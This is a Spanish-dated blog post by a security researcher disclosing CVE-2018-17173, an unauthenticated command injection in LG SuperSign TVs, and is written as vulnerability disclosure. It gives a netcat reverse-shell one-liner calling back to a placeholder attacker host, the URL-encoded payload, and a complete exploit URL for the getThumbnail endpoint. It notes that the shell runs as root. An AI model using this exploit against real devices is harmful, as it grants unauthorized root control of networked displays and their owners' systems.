miércoles, 19 de septiembre de 2018

LG SuperSign RCE! (to the 'luna' and back to shell)


Publishing the previous vulnerabilities in LG SuperSign TVs left me a bad taste in my mouth. Something like "I know that there must be something more".  So, I continued with my research and finally found the precious RCE.

This vulnerability has been addressed with the following CVE-2018-17173

The vuln


Playing with the app through burp I saw a url with some parameters. These URL is requested when the application needs to load the thumbnails of the images the user has uploaded.



So, I started to fuzz these parameters with ZAP until I found something interesting:



The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the values "' or 1 --'". It looked like it was triggering a command that was calling this utility but failling due to an unexpected parameter. Cleaning a little bit the input I found that with the value ' -' it was enough to receive this response. I knew I was close.

If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc, etc. After some failed attemps I tried with ' -;reboot;' and I saw how the TV was rebooting...the RCE was knocking on my door.

Getting a Shell

Taking advantage of the LFI, I knew that the TV had a netcat but was the netcat version  that doesn't support the -e option (downloading the binary), so I used the alternative:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

Encoded all to be passed in the URL

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E
%261%7Cnc%20ATTACKER_IP%20PORT%20%3E%2Ftmp%2Ff


So, the payload was ready:


' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i
%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;'


Putting it all together:



http://LG_SuperSign_IP:9080/qsr_server/device/getThumbnail?sourceUri=
%27%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2F
bin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE__PORT
%20%3E%2Ftmp%2Ff;%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&
targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150


I launched netcat to catch the shell, made the request and...

 

I was in.



In a few days I'll be updating this post with more technical details. 
That is all for now.


Points to take into account:

-No need to be authenticated
-No need to privilege escalation (app is running as root)